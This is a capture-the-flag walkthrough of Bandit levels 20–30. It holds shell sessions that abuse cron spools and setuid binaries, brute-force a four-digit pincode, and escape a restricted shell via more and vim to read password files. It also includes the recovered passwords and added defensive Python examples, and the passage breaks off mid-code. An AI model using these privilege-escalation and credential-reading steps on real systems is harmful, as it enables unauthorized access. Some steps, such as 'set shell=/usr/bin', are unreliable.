OverTheWire Bandit wargame (21-34)

Bandit solutions (21-34)

Bandit Level 20 → Level 21

Level Goal

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: Try connecting to your own network daemon to see if it works as you think

This level exposed how poor my English is and cost me a fair amount of time. According to the description this is another setuid binary: the program connects to the local port you specify on the command line, reads one line of text from that connection and compares it with the current level's password; if it matches, it sends back the password for the next level.

bandit20@bandit:~$ ls
suconnect
bandit20@bandit:~$ file suconnect
suconnect: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=74c0f6dc184e0412b6dc52e542782f43807268e1, not stripped
bandit20@bandit:~$ ./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side, the next password is transmitted back.

This level needs the -l option of nc:

-l, --listen (Listen for connections)
    Listen for connections rather than connecting to a remote machine

❗❗❗ This option listens for incoming connections instead of connecting out to a remote host.

So, per the task: we open a listening port that sends the current password, then run this level's program against that port so it receives the password; if it matches, the program hands us the next level's password.

I scanned the ports already in use with nmap to find a free one; the output is too long to include here.

bandit20@bandit:~$ echo GbKksEFF4yrVs6il55v6gwY5aVje5f0j | nc -l -p 60001 &
[7] 6923
[5]   Exit 1                  nc -l -p 60000
bandit20@bandit:~$ ./suconnect 60001
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Password in hand, on to the next level.

Bandit Level 21 → Level 22

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

This level introduces cron, which can schedule other programs to run at specified times or intervals. Following the hint, we go to the /etc/cron.d/ directory.

bandit21@bandit:~$ 
bandit21@bandit:~$ ls
bandit21@bandit:~$ cd /etc/cron.d
bandit21@bandit:/etc/cron.d$ ls -al
total 36
drwxr-xr-x  2 root root 4096 Jul 11  2020 .
drwxr-xr-x 87 root root 4096 May 14  2020 ..
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit15_root
-rw-r--r--  1 root root   62 Jul 11  2020 cronjob_bandit17_root
-rw-r--r--  1 root root  120 May  7  2020 cronjob_bandit22
-rw-r--r--  1 root root  122 May  7  2020 cronjob_bandit23
-rw-r--r--  1 root root  120 May 14  2020 cronjob_bandit24
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit25_root
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
bandit21@bandit:/etc/cron.d$ crontab -h
crontab: invalid option -- 'h'
crontab: usage error: unrecognized option
usage:	crontab [-u user] file
	crontab [ -u user ] [ -i ] { -e | -l | -r }
		(default operation is replace, per 1003.2)
	-e	(edit user's crontab)
	-l	(list user's crontab)
	-r	(delete user's crontab)
	-i	(prompt before deleting user's crontab)
bandit21@bandit:/etc/cron.d$ crontab -l
crontabs/bandit21/: fopen: Permission denied

No permission to list crontabs, so we have to go by the file names.

bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

So this shell script is run automatically (every minute, as user bandit22) with all of its output discarded. Let's look at the script itself.

bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

From this script we learn that the password is copied to this world-readable file under /tmp:

bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Password in hand.

Bandit Level 22 → Level 23

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

Following the hint, go straight to the directory.

bandit22@bandit:~$ cd /etc/cron.d && ls -al
total 36
drwxr-xr-x  2 root root 4096 Jul 11  2020 .
drwxr-xr-x 87 root root 4096 May 14  2020 ..
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit15_root
-rw-r--r--  1 root root   62 Jul 11  2020 cronjob_bandit17_root
-rw-r--r--  1 root root  120 May  7  2020 cronjob_bandit22
-rw-r--r--  1 root root  122 May  7  2020 cronjob_bandit23
-rw-r--r--  1 root root  120 May 14  2020 cronjob_bandit24
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit25_root
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder

cronjob_bandit23 looks very suspicious; let's have a look.

bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

Very similar to the previous level. Let's copy this block and run it ourselves to see what it does.

bandit22@bandit:/tmp$ myname=$(whoami)
bandit22@bandit:/tmp$ mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
bandit22@bandit:/tmp$ echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@bandit:/tmp$ cat /tmp/8169b67bd894ddbb4412f91573b38db3
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Very happy, password in hand... except that logging in with it fails...

Comparing them, this password is identical to the previous level's 😋. Given the whoami in the script, perhaps the result depends on which user runs it?

bandit22@bandit:/tmp$ whoami
bandit22

So is it tied to bandit23? Let's replace bandit22 with bandit23 in the derivation.

bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1 
8ca319486bfbbc3663ea0fbe81326349

Now let's cat that file.

bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

🆗 Password in hand.
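The path derivation above reproduced in Python, as an added example that is not part of the original write-up. It follows the cron script's pipeline exactly (echo appends a newline, so the hash covers "I am user &lt;name&gt;\n") and shows the defender's point: the "secret" output location is a pure function of the user name, so anyone who can read the script can precompute every path.

```python
import hashlib
from typing import Dict, Iterable


def cron_target_path(user: str) -> str:
    """Reproduce the pipeline from /usr/bin/cronjob_bandit23.sh:

        echo I am user $myname | md5sum | cut -d ' ' -f 1

    echo terminates its output with a newline, so md5sum hashes
    "I am user <name>\n", not the bare sentence.
    """
    digest = hashlib.md5(f"I am user {user}\n".encode()).hexdigest()
    return f"/tmp/{digest}"


def path_without_newline(user: str) -> str:
    """The common mistake: hashing the sentence without echo's trailing newline.
    It yields a different, wrong path."""
    return "/tmp/" + hashlib.md5(f"I am user {user}".encode()).hexdigest()


def predictable_paths(users: Iterable[str]) -> Dict[str, str]:
    """Every user's drop location can be computed ahead of time from the
    script alone, which is why world-readable files with derived names in a
    shared /tmp leak: nothing about the path is secret."""
    return {u: cron_target_path(u) for u in users}


if __name__ == "__main__":
    for user, path in predictable_paths(["bandit22", "bandit23"]).items():
        print(f"{user}: {path}")
```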

Bandit Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

After reading the first hint I went off to study bash, only to find that this level needs very little of it. I'll still leave the link to the material: Shell Scripting Tutorial.

As in the previous levels, quickly check what the script does.

bandit23@bandit:~$ cd /etc/cron.d && ls -al
total 36
drwxr-xr-x  2 root root 4096 Jul 11  2020 .
drwxr-xr-x 87 root root 4096 May 14  2020 ..
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit15_root
-rw-r--r--  1 root root   62 Jul 11  2020 cronjob_bandit17_root
-rw-r--r--  1 root root  120 May  7  2020 cronjob_bandit22
-rw-r--r--  1 root root  122 May  7  2020 cronjob_bandit23
-rw-r--r--  1 root root  120 May 14  2020 cronjob_bandit24
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit25_root
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

Let's look at that directory.

bandit23@bandit:/tmp/highway24$ ls /var/spool/$(whoami)
ls: cannot access '/var/spool/bandit23': No such file or directory

It doesn't exist 😥, which means the user running this script is not bandit23.

That is because the script runs as a different user (the cron entry runs it as bandit24), so myname is not bandit23.

Reading the script: every file in /var/spool/$myname is handled in turn; if its owner is bandit23, that is, us, it is executed (with a 60-second timeout), and then the file is deleted whether it ran or not. That gives us an idea.

So let's look at that directory.

bandit23@bandit:/tmp/highway24$ ls /var/spool -l
total 12
drwxrwx-wx 23 root bandit24 4096 Jun 22 11:16 bandit24
drwxr-xr-x  3 root root     4096 May  3  2020 cron
lrwxrwxrwx  1 root root        7 May  3  2020 mail -> ../mail
drwx------  2 root root     4096 Jan 14  2018 rsyslog

So the real directory is /var/spool/bandit24 (world-writable, note the -wx on "others"). We just need to write a script, drop it in there and wait for cron to execute it.

This is the hardest part to come up with. You may remember the /etc/bandit_pass directory from earlier levels, which stores all the passwords; we only need a shell script that grabs the one we want.

But my own script hit a snag: the logic looked right yet it simply didn't work. I didn't understand why, so I used one found through Google.

#!/bin/bash
mkdir /tmp/DotSlash
cat /etc/bandit_pass/bandit24 > /tmp/DotSlash/pass.txt
# The original line, "echo password = cat /tmp/DotSlash/pass.txt", only echoes those
# literal words; $(...) is needed to substitute the file's content. Either way the cron
# entry sends the job's output to /dev/null, so nothing echoed here is ever seen.
echo "password = $(cat /tmp/DotSlash/pass.txt)"

This script did the job, but the echo produced nothing visible, so we have to cat the file ourselves. All that's left is to make the script executable and drop it into /var/spool/bandit24.

bandit23@bandit:/tmp/highway24$ chmod 777 myshel24.sh
bandit23@bandit:/tmp/highway24$ cp myshell24.sh /var/spool/bandit24
---------wait a moment-------------
bandit23@bandit:/tmp/highway24$ ls /tmp/DotSlash
pass.txt
bandit23@bandit:/tmp/highway24$ cat /tmp/DotSlash/pass.txt
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

As you can see, the final echo never shows up anywhere. Looking back at the cron entry explains it: the job's output is redirected with &> /dev/null, so anything the script prints is thrown away (and echoing the literal words "cat /tmp/DotSlash/pass.txt" without $(...) would not print the password anyway). Others have hit the same thing; at least the password can still be obtained from the file.

Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

This level is a first taste of bash scripting; mine isn't great, honestly.

Per the task, we need to send the password plus a pincode in the range 0~10000 to port 30002. That's far too many to type by hand, so automate it. Go to the working directory:

bandit24@bandit:/tmp/highway25$ cd /tmp/highway25
bandit24@bandit:/tmp/highway25$ for ((i=0;i<10000;i++));do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> pingcode.txt;done
bandit24@bandit:/tmp/highway25$ nc localhost -p 30002 < pingcode.txt
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

If the one-liner is hard to read, here it is spread out:

#!/bin/bash
# Append one "<password> <pincode>" line per candidate to pingcode.txt.
# The for ((...)) arithmetic loop is bash syntax, so the shebang must be bash, not sh.
for ((i=0;i<10000;i++))
do
	echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> pingcode.txt
done
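The daemon's line protocol modelled in-process, as an added example (not the game's own code): each line is "&lt;password&gt; &lt;pin&gt;", the daemon answers per line and keeps reading, which is why streaming all 10000 lines down one nc connection works. Only the reply "Correct!" is from the page; the other reply strings are constructed, and max_attempts is an added mitigation showing why a bounded attempt count defeats enumeration of a 4-digit space.

```python
from dataclasses import dataclass
from typing import Iterator, Optional, Tuple

PIN_SPACE = 10000   # a 4-digit pincode has exactly 10000 values, 0..9999


@dataclass
class PinDaemon:
    """Line-oriented check modelled on the level's daemon.
    Reply strings other than "Correct!" are constructed for this model.
    max_attempts is the added mitigation: None means unlimited, as in the game."""
    password: str
    pin: int
    max_attempts: Optional[int] = None
    attempts: int = 0
    locked: bool = False

    def handle_line(self, line: str) -> str:
        if self.locked:
            return "Too many attempts, closing connection"
        self.attempts += 1
        parts = line.split()
        if len(parts) != 2 or not parts[1].isdigit():
            return "Fail! Expected '<password> <pincode>'"
        if parts[0] == self.password and int(parts[1]) == self.pin:
            return "Correct!"
        if self.max_attempts is not None and self.attempts >= self.max_attempts:
            self.locked = True          # one bounded connection instead of 10000 free guesses
        return "Wrong!"


def candidate_lines(password: str) -> Iterator[str]:
    """The same lines the walkthrough's for-loop appended to pingcode.txt."""
    for i in range(PIN_SPACE):
        yield f"{password} {i}"


def stream_attempt(daemon: PinDaemon, password: str) -> Tuple[Optional[int], int]:
    """Push every candidate down one connection, as `nc < pingcode.txt` does.
    Returns (pin found or None, number of lines sent before success or lockout)."""
    sent = 0
    for line in candidate_lines(password):
        sent += 1
        reply = daemon.handle_line(line)
        if reply == "Correct!":
            return int(line.split()[1]), sent
        if daemon.locked:
            break
    return None, sent


if __name__ == "__main__":
    print(stream_attempt(PinDaemon("pw", 4242), "pw"))                  # (4242, 4243)
    print(stream_attempt(PinDaemon("pw", 4242, max_attempts=5), "pw"))  # (None, 5)
```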

Bandit Level 25 → Level 26

Level Goal

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

I learned quite a lot in this level; let's take it step by step.

The usual routine:

bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
Could not create directory '/home/bandit25/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Connection to localhost closed.

This looks a lot like an earlier level, doesn't it? Did the same idea occur to you? Let's test it:

bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey -t echo 1
Could not create directory '/home/bandit25/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Connection to localhost closed.

No output. So back to the hint: bandit26's shell is not /bin/bash. Where do we look up a user's login shell?

In /etc/passwd, a very important file on Linux (see Understanding /etc/passwd File Format). After a quick read of that, let's begin.

Let's see what bandit26's shell is:

bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
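A parser for the /etc/passwd format discussed here, plus the check an administrator would run to catch accounts like bandit26, as an added example that is not from the original write-up. The sample records and the stand-in for /etc/shells are constructed; only the bandit26 line is from the level.

```python
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample records; the bandit26 line is the one shown in the level.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bandit25:x:11025:11025:bandit level 25:/home/bandit25:/bin/bash
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
"""

# Constructed stand-in for /etc/shells; a real audit reads the system's own file.
KNOWN_SHELLS = {"/bin/sh", "/bin/bash", "/usr/sbin/nologin", "/bin/false"}


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Each record has seven colon-separated fields:
    name:password:uid:gid:gecos:home:shell (password is 'x' when in /etc/shadow)."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def lookup(entries: Iterable[PasswdEntry], name: str) -> Optional[PasswdEntry]:
    return next((e for e in entries if e.name == name), None)


def unusual_shells(entries: Iterable[PasswdEntry], known=KNOWN_SHELLS) -> List[PasswdEntry]:
    """Accounts whose login shell is not a registered shell. Each one is a wrapper
    whose escape routes (here: a pager that launches an editor on 'v') need review;
    a restricted 'shell' is only as restrictive as every program it hands control to."""
    return [e for e in entries if e.shell not in known]


if __name__ == "__main__":
    for e in unusual_shells(parse_passwd(SAMPLE_PASSWD)):
        print(f"{e.name} (uid {e.uid}) logs in with {e.shell}")
```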

It is /usr/bin/showtext, so let's cat that:

bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

more ~/text.txt
exit 0

The script runs more. more is a pager that shows text one screenful at a time, so it only stops and waits for input when the terminal is too small to show the whole file at once:

more is a filter for paging through text one screenful at a time. This version is especially primitive. Users should realize that less provides more emulation plus extensive enhancements.

Shrink your terminal window to just a few lines, then reconnect:

bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey

Now we're sitting inside more. According to the more manual, v launches the text editor configured in the environment:

v
    Start up an editor at current line. The editor is taken from
    the environment variable VISUAL if defined, or EDITOR if
    VISUAL is not defined, or defaults to vi(1) if neither VISUAL
    nor EDITOR is defined.

Press v to drop into vim, where :e opens any readable file: :e /etc/bandit_pass/bandit26

And this level's password is in hand: 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

But the password alone won't log us into the next level, since its shell is still showtext. So how do we get in?

See the next level.

Bandit Level 26 → Level 27

Level Goal

Good job getting a shell! Now hurry and grab the password for bandit27!

This level builds directly on the previous one: you need to be logged in to level 26 already, so keep that environment. We need a shell, and vim can give us one, but because bandit26's configured shell points somewhere odd we have to set it ourselves: in vim, type set shell=/usr/bin

The shell is back to normal, so we can use it as usual:

bandit26@bandit:~$ ls
bandit27-do  text.txt

cat says the file is unreadable, but file shows it is a setuid executable, so let's run it and see.

What a setuid executable is was covered back in level 20.

bandit26@bandit:~$ file bandit27-do
bandit27-do: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8e941f24b8c5cd0af67b22b724c57e1ab92a92a1, not stripped
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.
  Example: ./bandit27-do id

Then it's simple:

bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea

Password in hand. Next level... emmm, we still never found out what the level 25 password was for (。^▽^) hhh

Bandit Level 27 → Level 28

Level Goal

There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo. The password for the user bandit27-git is the same as for the user bandit27.

Clone the repository and find the password for the next level.

This level is very simple, just basic git usage.

bandit27@bandit:~$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
fatal: could not create work tree dir 'repo': Permission denied
bandit27@bandit:~$ ls
bandit27@bandit:~$ pwd
/home/bandit27
bandit27@bandit:~$ file /home/bandit27
/home/bandit27: directory
bandit27@bandit:~$ ls -l /home/bandi27
ls: cannot access '/home/bandi27': No such file or directory

We have no write permission in our home directory.

bandit27@bandit:/tmp/highway27$ ls -l /home | grep bandit27
drwxr-xr-x 2 root         root         4096 May  7  2020 bandit27
drwxr-x--- 3 bandit27-git bandit27-git 4096 Jun  9 10:25 bandit27-git

There is a bandit27-git directory, obviously related to this level; let's take a look.

bandit27@bandit:~$ cd /home/bandit27-git
-bash: cd: /home/bandit27-git: Permission denied

Can't read it. Then I thought: we can clone the repository under /tmp instead. Let's try.

bandit27@bandit:~$ mkdir /tmp/highway27 && cd /tmp/highway27
bandit27@bandit:/tmp/highway27$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.

It asks for a password once, but the task already told us it's this level's password, so type it in and the clone completes. Look inside, and the next level's password is right there. (●ˇ∀ˇ●)

bandit27@bandit:/tmp/highway27$ ls -l
total 4
drwxr-sr-x 3 bandit27 root 4096 Jun 24 02:47 repo
bandit27@bandit:/tmp/highway27$ ls -l /tmp/highway27/repo
total 4
-rw-r--r-- 1 bandit27 root 68 Jun 24 02:47 README
bandit27@bandit:/tmp/highway27$ cat /tmp/highway27/repo/README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2

Bandit Level 28 → Level 29

Level Goal

There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo. The password for the user bandit28-git is the same as for the user bandit28.

Clone the repository and find the password for the next level.

Although the task text is almost identical to the last one, this level is really about basic git usage. Same steps to start:

bandit28@bandit:~$ ls
bandit28@bandit:~$ ls -l /home | grep bandit28
drwxr-xr-x 2 root         root         4096 May  7  2020 bandit28
drwxr-x--- 3 bandit28-git bandit28-git 4096 May  7  2020 bandit28-git
bandit28@bandit:~$ mkdir /tmp/highway28 && cd /tmp/highway28
bandit28@bandit:/tmp/highway28$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo

bandit28@bandit:/tmp/highway28$ ls -l
total 4
drwxr-sr-x 3 bandit28 root 4096 Jun 24 03:03 repo
bandit28@bandit:/tmp/highway28$ ls -l /tmp/highway28/repo
total 4
-rw-r--r-- 1 bandit28 root 111 Jun 24 03:03 README.md
bandit28@bandit:/tmp/highway28$ cat /tmp/highway28/repo/README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

But here we hit a snag: the password has been masked out.

For a quick introduction to git see An introduction to Git: what it is, and how to use it to pick up some commands, then go deeper with Learn the workings of Git, not just the commands.

Read those first, then carry on.

First, let's look at the git log:

bandit28@bandit:/tmp/highway28/repo$ git log
commit edd935d60906b33f0619605abd1689808ccdd5ee
Author: Morla Porla <morla@overthewire.org>
Date:   Thu May 7 20:14:49 2020 +0200

    fix info leak

commit c086d11a00c0648d095d04c089786efef5e01264
Author: Morla Porla <morla@overthewire.org>
Date:   Thu May 7 20:14:49 2020 +0200

    add missing data

commit de2ebe2d5fd1598cd547f4d56247e053be3fdc38
Author: Ben Dover <noone@overthewire.org>
Date:   Thu May 7 20:14:49 2020 +0200

    initial commit of README.md

The indented line under each commit is its message. The bottom one is the initial commit; let's look at that first.

bandit28@bandit:/tmp/highway28/repo$ git checkout de2ebe2d5fd1598cd547f4d56247e053be3fdc38
Note: checking out 'de2ebe2d5fd1598cd547f4d56247e053be3fdc38'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at de2ebe2... initial commit of README.md

Now we can inspect the file as it was in that commit:

bandit28@bandit:/tmp/highway28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: <TBD>

Not it. Then it must be the "add missing data" commit:

bandit28@bandit:/tmp/highway28/repo$ git checkout c086d11a00c0648d095d04c089786efef5e01264
bandit28@bandit:/tmp/highway28/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: bbc96594b4e001778eee9975372716b2

Password in hand.

Bandit Level 29 → Level 30

Level Goal

There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo. The password for the user bandit29-git is the same as for the user bandit29.

Clone the repository and find the password for the next level.

This level is about git repositories again; same steps as before (omitted).

bandit29@bandit:/tmp/highway29$ cd repo && cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

bandit29@bandit:/tmp/highway29/repo$ git log
commit 208f463b5b3992906eabf23c562eda3277fea912
Author: Ben Dover <noone@overthewire.org>
Date:   Thu May 7 20:14:51 2020 +0200

    fix username

commit 18a6fd6d5ef7f0874bbdda2fa0d77b3b81fd63f7
Author: Ben Dover <noone@overthewire.org>
Date:   Thu May 7 20:14:51 2020 +0200

    initial commit of README.md

As expected, no password. From what we learned, could it be on another branch? Let's see.

Most write-ups just use plain git branch -a to list the branches and then poke around until the password appears, but a search turned up one using git show-branch --all, which is the genuinely useful command here because it shows each branch's commits side by side.

bandit29@bandit:/tmp/highway29/repo$ git branch -a
* master
  remotes/origin/HEAD -> origin/master
  remotes/origin/dev
  remotes/origin/master
  remotes/origin/sploits-dev
bandit29@bandit:/tmp/highway29/repo$ git show-branch --all
* [master] fix username
 ! [origin/HEAD] fix username
  ! [origin/dev] add data needed for development
   ! [origin/master] fix username
    ! [origin/sploits-dev] add some silly exploit, just for shit and giggles
-----
  +   [origin/dev] add data needed for development
  +   [origin/dev^] add gif2ascii
    + [origin/sploits-dev] add some silly exploit, just for shit and giggles
*++++ [master] fix username

The note says no passwords in production, so they are probably in development; I think that's the biggest hint. Let's check out that branch.

bandit29@bandit:/tmp/highway29/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/highway29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf

Password in hand.

Bandit Level 30 → Level 31

Level Goal

There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo. The password for the user bandit30-git is the same as for the user bandit30.

Clone the repository and find the password for the next level.

This level uses git tags. A tag marks a specific point in a repository's history, and -m attaches an annotation message to it.

This level is a bit mysterious; after a lot of searching I still hadn't found out why it behaves the way it does.

The usual routine: create a directory, git clone, and begin.

bandit30@bandit:/tmp/highway30/repo$ cat README.md
just an epmty file... muahaha

Then let's look at the branches:

bandit30@bandit:/tmp/highway30/repo$ git show-branch --all
! [master] initial commit of README.md
 ! [origin/HEAD] initial commit of README.md
  ! [origin/master] initial commit of README.md
---
+++ [master] initial commit of README.md
bandit30@bandit:/tmp/highway30/repo$ 

Nothing of note. What about the log?

bandit30@bandit:/tmp/highway30/repo$ git log
commit 3aefa229469b7ba1cc08203e5d8fa299354c496b
Author: Ben Dover <noone@overthewire.org>
Date:   Thu May 7 20:14:54 2020 +0200

    initial commit of README.md

Nothing there either. Let's look at the tags, and this is where the fun begins. If you don't know what tags are, see 2.6 Git Basics - Tagging, though it doesn't help much with this one, because what happens next is rather odd.

bandit30@bandit:/tmp/highway30/repo$ git tag
secret

Then, following the manual, we check it out:

bandit30@bandit:/tmp/highway30/repo$ git checkout secret
fatal: reference is not a tree: secret

Very strange: a tag that doesn't point at any commit. git's error is literal: checkout needs a tree to populate the working directory, and whatever this tag references has none.

bandit30@bandit:/tmp/highway30/repo$ git show secret
47e603bb428404d265f59c42920d81e5

And git show on this tag prints no commit information either, just a bare line of content. I never found a write-up explaining how this was done, but the mechanism is simple: git tag accepts any object id, not only commits, so this tag was created pointing straight at a blob containing the password. checkout fails because a blob has no tree, while show just prints the blob. Either way, the answer is in hand.
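A toy model of git's object store that reproduces this level's behaviour, as an added example that is not the write-up's or git's own code. Object ids are computed exactly as git does (sha1 over "&lt;type&gt; &lt;size&gt;\0&lt;content&gt;"), so the blob ids match `git hash-object`; tree and commit layouts are simplified, and the secret blob's content is a constructed placeholder, not the real password.

```python
import hashlib
from typing import Dict, Optional, Tuple

GitObject = Tuple[str, bytes]   # (object type, raw content)


def object_id(kind: str, content: bytes) -> str:
    """Object ids are sha1 over the header "<type> <size>\\0" followed by the content."""
    header = f"{kind} {len(content)}\0".encode()
    return hashlib.sha1(header + content).hexdigest()


class Repo:
    """Object store plus refs. Tree and commit formats are simplified."""

    def __init__(self) -> None:
        self.objects: Dict[str, GitObject] = {}
        self.refs: Dict[str, str] = {}     # e.g. refs/tags/secret -> object id

    def store(self, kind: str, content: bytes) -> str:
        oid = object_id(kind, content)
        self.objects[oid] = (kind, content)
        return oid

    def tag(self, name: str, oid: str) -> None:
        # `git tag <name> <object>` accepts a blob id just as readily as a commit id
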